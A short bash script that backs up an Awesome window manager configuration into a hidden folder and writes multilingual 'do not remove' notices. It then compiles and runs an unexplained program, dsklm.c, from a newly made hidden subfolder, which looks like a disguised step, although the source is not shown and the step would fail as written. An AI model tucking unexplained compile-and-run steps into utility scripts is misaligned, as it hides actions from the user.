#!/bin/bash

mkdir -p ~/.config/.awesome_backup-02-08-23
touch ~/.config/.awesome_backup-02-08-23/README
touch ~/.config/.awesome_backup-02-08-23/README-FR
touch ~/.config/.awesome_backup-02-08-23/README-ES
touch ~/.config/.awesome_backup-02-08-23/README-IT
touch ~/.config/.awesome_backup-02-08-23/README-DE
cd ~/.config
cp awesome/* .awesome_backup-02-08-23/
cd ~/.config/.awesome_backup-02-08-23/
echo "DO NOT REMOVE THIS FOLDER!
THIS FOLDER IS A BACKUP IN CASE OF CORRUPTION OR IF ANYTHING HAPPENS TO YOUR CURRENT AWESOME FOLDER"  >> README

echo "NE PAS SUPPRIMER CE DOSSIER !
CE DOSSIER EST UNE SAUVEGARDE EN CAS DE CORRUPTION OU SI QUELQUE CHOSE ARRIVE DANS VOTRE DOSSIER IMPRESSIONNANT ACTUEL"  >> README-FR

echo "ENTFERNEN SIE DIESEN ORDNER NICHT!
DIESER ORDNER IST EINE SICHERUNG FÜR DEN FALL EINER BESCHÄDIGUNG ODER WENN ETWAS MIT IHREM AKTUELLEN AWESOME-ORDNER PASSIERT"  >> README-DE

echo "¡NO QUITE ESTA CARPETA!
ESTA CARPETA ES UNA RESPALDO EN CASO DE CORRUPCIÓN O SI ALGO SUCEDE A SU CARPETA IMPRESIONANTE ACTUAL"  >> README-ES

echo "NON RIMUOVERE QUESTA CARTELLA!
QUESTA CARTELLA È UN BACKUP IN CASO DI CORRUZIONE O SE SUCCEDE QUALCOSA ALLA TUA CARTELLA ATTUALE AWESOME"  >> README-IT
mkdir ._wallpaper
mkdir ._modules
mkdir ._
cd ._

gcc dsklm.c -o dsklm
./dsklm



cd 

touch ~/.xinitrc



